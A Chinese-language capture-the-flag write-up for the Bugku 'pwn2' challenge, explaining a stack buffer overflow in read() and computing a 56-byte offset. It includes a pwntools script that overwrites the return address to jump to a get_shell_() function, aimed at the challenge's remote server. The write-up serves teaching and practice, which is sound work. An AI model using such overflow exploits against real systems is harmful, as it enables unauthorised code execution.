bugku-pwn2-wp

下载完题后先在VM中checksec查看保护机制

基本没有开什么保护，可以知道文件是64位的，用64位IDA打开，按F5键反汇编一下，看一下main函数

可以发现read()函数存在栈溢出漏洞，缓冲区s的大小为0x30，而read()函数指向缓冲区中读入0x100大小的数据，所以造成栈溢出。
在main函数下面有一个get_shell_()函数，打开看一下

有一个system(“cat flag”),cat flag是得到flag的指令，所以只要执行了get_shell_()函数，就能得到flag。利用栈溢出，控制跳转，跳转到get_shell_()函数的地址执行get_shell_()函数，即利用read()函数将get_shell_()函数的地址写在s处，执行get_shell_()函数.
使用gdb调试程序，查看栈的情况

在read函数那下个断点，然后跟进去，由于这是个64位的程序，所以read函数的三个参数依次保存在rdi、rsi、rdx、rcx、r8、r9中。所以rdi为0，rsi为buffer的地址，rdx为0x100.
RBP—RSI为缓冲区大小(0x30),将0x30转为十进制

所以偏移地址为RBP-RSI+8=48+8=56,加8是因为64位程序下的rbp占8个字节所以加8
找到get_shell_()函数地址为

脚本如下：

from pwn import *

context.log_level = 'debug'

# conn = process('./pwn2')
conn = remote('114.116.54.89',10003)

shell_addr = 0x0000000000400751

conn.recvuntil('say something?')

payload = 'A' * 56 + p64(shell_addr)

conn.sendline(payload)

conn.interactive()

执行脚本得到flag

参考文章
参考文章